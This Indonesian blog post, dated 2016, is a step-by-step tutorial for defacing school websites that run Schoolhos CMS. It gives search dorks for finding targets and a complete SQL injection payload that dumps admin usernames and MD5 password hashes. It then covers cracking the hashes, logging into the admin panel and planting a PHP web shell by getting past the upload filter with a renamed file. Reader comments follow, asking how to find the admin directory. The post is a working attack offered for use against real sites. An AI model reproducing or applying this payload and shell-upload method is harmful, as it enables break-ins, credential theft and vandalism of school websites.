Deface SQLi Schoolhos CMS

Sunday, July 31, 2016

Deface SQLi Schoolhos CMS

 

Deface SQLi Schoolhos CMS

Lagi lagi CMS yang banyak di gunakan website sekolah memiliki BUG, setelah Balitbang, Popoji CMS.. Nanti apa lagi yah ?? Kali ini bukan tentang Baltibang atau Popoji CMS melainkan "Schoolhos CMS" mungkin CMS ini belum sempurna makanya masih memiliki BUG yang Cukup beresiko !! simak langsung aja tutorial "Deface SQLi Schoolhos CMS"


Bahan-bahan :

1. Dork :
# inurl:"/?p=info" site:id
# inurl:"/?p=detberita"
# inurl:"/?p=guru" site:id
kembangkan lagi dengan otak hentai kalian :v

2. SQL Injection (Exploit SQL)
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

3. MD5 Hash Decrypter : https://hashkiller.co.uk/

Step by Step :

1. Dorking di gugel (jangan dorking gambar coeg)

2. Pilih target kamu

3. Masukan Exploit (SQL Injection) contoh : http://targetkamu.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

Deface SQLi Schoolhos CMS

4. Kalo vuln akan muncul username dan password nya.

Deface SQLi Schoolhos CMS

Note : itukan setelah admin ada angka-angka contoh : admin20160407 nah si angka 20160407 abaikan aja.

5. Copy MD5 Hash tadi, lalu kamu buka MD5 Decrypter tadi. kamu masukan di situ. hash yang tadi.

6. Setelah selesai di hash kamu login ke panel admin. lokasinya : http://targetkamu.domain/adminpanel/

7. Masukan username dan password yang kamu dapat tadi..

8. Lanjut !! mau tanam shell ?? kamu tinggal ke menu Berita, Informasi, Album Galeri.

9. Rename dlu shell kamu dari shell.php jadi shell.php.jpg

10. Setelah itu pilih shell kamu lalu gunakan tamper data..

11. Ganti nama shell kamu dari shell.php.jpg jadi shell.php (ganti pas di tamper datanya)

Note : tanam shell dan akses shell nya sama kaya Lokomedia kok.

Warning ! : Karena yang menggunakan CMS ini adalah web sekolah.. saya mohon jangan terlalu berlebihan mengexploitnya. Dan jangan juga tebas index malu om sama total archive defacean kamu.
Apalagi bawa-bawa nama Indonesia dan blabla. Pengen tenar ?? kaga usah show off defacean web sekolah.. kalo gw liat sih bakal gw ketawain.

Thanks to : Febru4ry - GooBlog

Notif Banyak Kaga Di Bayar, Ranking Naik Kaga Otomatis Master !!

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disi

Related Post

Next
Previous
Click here for Comments

8 comments:

avatar

min, websitenya saya tambah /adminpanel kok gak bisa ya? kenapa min?

avatar

berarti direktori adminpanel tidak ada

avatar

apakah ada solusinya min?

avatar

Min gua mau nanya gimana sih cara buat bkin sqli codenya ??

avatar

ane juga liat2 di gugel doank

avatar

gunakan imajinasi dan otak mu untuk mencari direktori tempat admin loginnya

avatar

cara patch bugnya gimana min?

avatar

Numpang Comot Bg Sumbernya Gw Singkat [GSH]